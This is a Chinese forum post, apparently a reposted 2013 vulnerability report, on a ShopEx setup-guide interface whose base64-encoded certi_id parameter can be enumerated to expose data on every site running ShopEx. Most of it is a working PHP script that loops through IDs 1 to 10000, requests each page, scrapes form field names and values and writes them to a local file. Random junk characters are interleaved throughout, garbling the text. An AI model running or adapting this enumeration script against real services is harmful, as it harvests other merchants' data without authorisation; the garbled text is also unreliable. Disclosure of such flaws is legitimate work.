|
|
简要描述:' M' n) t9 O7 v! h- }8 ~
ShopEx某接口缺陷,可遍历所有网站! n6 f* T: J7 U4 J
详细说明:' a8 o0 [, L* ]& g. X( a
问题出现在shopex 网店使用向导页面
# U0 q/ |8 `; ]5 p
) @- Q+ c5 v, z4 z
I8 I1 w4 V( v$ [& P) c1 \# f; T1 }! p7 x
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) `2 U9 n3 a( R6 _
& e, t, B. Z( F& g" x; i, l& t
) w( {- p R6 \% C5 k, B0 U
2 J) `. }* l. Zrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}0 S* e7 C% p( T7 p1 c$ Q
) V) R, P( X5 n9 V* j0 b, U
; O# Z9 e1 l& c/ o8 p
/ @: Z( @8 x% F. @8 Z我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
4 l& ~8 E( u7 t+ t7 C. A( [ E6 F) @" z4 I8 R& H) G
- ~& H8 g1 H9 d5 Z e3 n4 }
; w( d o2 j6 H a7 j, w* I<?php1 n1 G3 G: _5 B+ h
3 [: I& T$ M" \ v+ [) V
for ($i=1; $i < 10000; $i++) { //遍历6 q3 c2 a6 p! l- _# J( g1 d1 ^- I9 E) ^
8 D( W$ K& r6 | ~6 I+ E ShowshopExD($i);
4 g! T/ Q- @4 ^( L
3 Y3 y, h& L! h+ A. n( ^ }/ ?+ H! ~; K3 \: ]' q& B, s5 g8 p7 k
! S/ X) h- x( h1 P! m( T& o function ShowshopExD($cid) {
7 s/ O5 g2 w' o7 T4 s. C3 O% j% s# R6 f5 b
$url='http://guide.ecos.shopex.cn/step2.php';& X9 S1 f' A, D$ U' ~
0 [ k8 M S/ d7 F5 n$ B) W2 H9 Y
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');' x- d9 T' c3 E, @! |3 D
1 l% U e5 f7 N1 E& V5 Z $url = $url.'?refer='.$refer;$ y M, d0 F5 W) e. x/ m
* _7 v [% l- x. s $ch = curl_init($url);( ]8 S/ k5 U. M8 a& s4 Z
7 @+ }4 i' y1 Z
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;5 o& _5 O# z6 F, l
3 J( x" Z! ]6 _( F% ? curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;& j/ \( ^% j( G8 d
4 w& a% N3 }& [
$result = curl_exec($ch);
; d8 ^8 w- T/ F% o k2 C
% _5 @/ \# e* S+ B $result = mb_convert_encoding($result, "gb2312", "UTF-8");$ i' w) S( I! C, E
0 K6 \& i @7 w# G5 y2 B
if(strpos($result,$refer))0 f: u& H& E% r- m2 P* t
9 ?9 y# w2 p6 S+ [
{
( e" u( _* [4 Q& ]& F" M$ ]5 d. u; U5 H& j5 {8 W8 `- K/ B- |
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件) L/ v Y5 Y ~6 q" V8 W
0 T8 x( ^7 L1 M5 ^* j preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
. y8 Y/ f# I, Y* p" B6 t
1 B! y3 D, f" E$ l foreach ($value[1] as $key) {# o; k) s) }1 @4 z" y f- l
5 E) ?% ]* D w9 q) I5 Q2 f
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
/ y$ C1 O2 w+ D, |8 L5 A+ N) H+ d$ ~1 z( B
echo $res[1][0].':'.$res[3][0]."\r\n";
5 N! q( A1 U6 D% D
8 g( R& r4 x' G: \9 |( | $col =$res[1][0].':'.$res[3][0]."\r\n"; 5 n& D, D4 `3 Y( l, g7 E
4 {- p1 z0 P9 D2 q
fwrite($fp, $col, strlen($col));
% U% w. O, g& q, U* l. m0 y% O- a0 m, J# u7 C1 J
} @3 g7 M T, A' `0 r5 R% U2 m. y% D: e
; f; t6 [8 i7 T0 |' h) u echo '--------------------------------'."\r\n";
& L0 f6 ~& K; ^; t" E! _
2 B* T, n$ H2 d2 d" t0 N. P" I fclose($fp); / C8 w& j( f8 I( R( U9 t
3 [. M/ v! v0 }! I }9 |/ T' Z+ Y5 C j& J- J2 R
2 ?2 G" Z5 F$ Z& l6 T2 ^, R8 |+ _ flush();
: f9 Q) {. @' c d1 s o. O8 G( @9 g0 T
curl_close($ch);# p/ o0 F; b5 q% M1 K! I: Z& n! t
( F! Z/ P/ Z# p6 l" } ~# _2 |4 ` }
% ~, S$ b, D' Y8 P6 F& J
, d' I c; S0 q( ?8 s" Q?>" i+ C3 B# y% D' j
漏洞证明:+ R7 I) d( C. C; B$ \4 t
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
0 ~* Y$ q1 m5 I% j7 s6 ^# erefer换成其他加密方式
& o) w$ s* g3 K! C |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对